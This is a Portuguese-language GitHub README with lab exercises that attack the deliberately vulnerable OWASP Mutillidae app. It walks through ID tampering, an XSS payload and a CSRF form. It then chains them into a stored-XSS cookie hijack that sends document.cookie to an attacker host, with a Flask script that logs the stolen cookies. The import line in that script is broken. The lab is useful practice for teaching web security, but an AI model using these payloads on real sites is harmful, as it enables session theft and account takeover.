Skip to content

rl34075/Web-Attack

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

Web-Attack

Web Application Attack

Ataques em Aplicação Web

Utilizaremos como referência o projeto OWASP Mutillidae: https://securityonline.info/owasp-mutillidae-ii-web-pen-test-practice/

Exercício 1 - Abusando da aplicação com BurpSuite

  • Abrir o mutillidae: http://10.10.10.16:8080/mutillidae

  • Criar um usuário

  • Abrir o BurpSuite e capturar a requisição de login para identificar o ID

  • A aplicação atribuiu o ID 24 para o usuário

  • Se alterarmos o ID para 1

  • É possível identificar que o usuário alterou para root

XSS

Exercício 2 - XSS

  • Abrir o mutillidae: http://10.10.10.16:8080/mutillidae

  • Realizar logon com o usuário criado.

  • Acessar OWASP 2013 > A CSRF > Add to your blog

  • Inserir dados no blog:

    <script>alert(document.cookie)</script>
    

CSRF

Exercício 3 - CSRF

  • Abrir o mutillidae: http://10.10.10.16:8080/mutillidae

  • Acessar OWASP 2013 > A CSRF > Add to your blog

  • Inserir dados no blog e capturar no BurpSuite

  • Utilizaremos os parâmetros capturados no BurpSuite para nosso ataque CSRF e alteraremos o conteúdo.

    • csrf-token = NULL
    • blog_entry = "Blog Hackeado"
    • add-to-your-blog-php-submit-button = "Save Blog Entry"
  • Criar um HTML com as seguintes informações

    CSRF.html

    <form name="csrf" action="https://192.168.56.101/mutillidae/index.php?page=add-to-your-blog.php" method="POST">
    <input type="hidden" name='csrf-token' value=''>
    <input type="hidden" name='blog_entry' value='Blog Hackeado'>
    <input type="hidden" name='add-to-your-blog-php-submit-button' value='Save Blog Entry'>
    </form>
    
  • Uma vez que o usuário autenticado abre o arquivo html, o CSRF é executado.

COOKIE HIJACK

Exercício 4 - Cookie Hijack

  • Realizaremos um XSS via CSRF e com Cookie Hijack

    Abrir um html encode (https://emn178.github.io/online-tools/html_encode.html) e inserir o seguinte abaixo (O objetivo é encodar nosso código para não quebrar o script):

     <script>document.location="http://10.10.10.13:8080/?c="+document.cookie;</script>
    
  • A informação encodada deverá ficar como descrito abaixo:

     &lt;script&gt;document.location=&quot;http://10.10.10.13:8080/?c=&quot;+document.cookie;&lt;/script&gt;
    
  • Alterar o HTML anterior inserindo os dados:

      <form name="csrf" action="https://192.168.56.101/mutillidae/index.php?page=add-to-your-blog.php" method="POST">
      <input type="hidden" name='csrf-token' value=''>
      <input type="hidden" name='blog_entry' value='&lt;script&gt;document.location=&quot;http://10.10.10.13:8080/?c=&quot;+document.cookie;&lt;/script&gt;'>
      <input type="hidden" name='add-to-your-blog-php-submit-button' value='Save Blog Entry'>
      </form>
    
  • Criar um Script python:

    get_cookie.py

    from flask import Flask, request, redirect
    from  import 
    app = Flask(__name__)  	# cria instancia do app
    @app.route('/') 		
    def cookie():
          # Captura os cookie e salva no arquivo ”cookies.txt"
        cookie = request.args.get('c')
        f = open("cookies.txt","a")
        f.write(cookie + ' ' + str(datetime.now()) + '\n')
        f.close()
          # Redireciona o usuário para outra página
        return redirect("http://pudim.com.br")
    if __name__ == "__main__":
        app.run(host = '0.0.0.0', port=8080) 
    
  • Executar o script get_cookie.py

    python get_cookie.py
    

  • Ao abrir o arquivo html na maquina da vítima, é possível identificar que o cookie foi capturado na maquina do atacante:

  • A partir daí é possível se conectar como usuário apenas usando o cookie de sessão.

  • Basta copiar o cookie da sessão: v6qql07p4ee7re69p79t7fq8ru e substituir na pagina do atacante

  • Ao realizar refresh na página você verá que o atacante conseguiu se logar na aplicação com o cookie do usuário

  • Qualquer usuário autenticado que abrir a página do blog, terá seu cookie capturado.

  • O arquivo cookie.txt também contém as informações dos cookies.

About

Web Application Attack

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published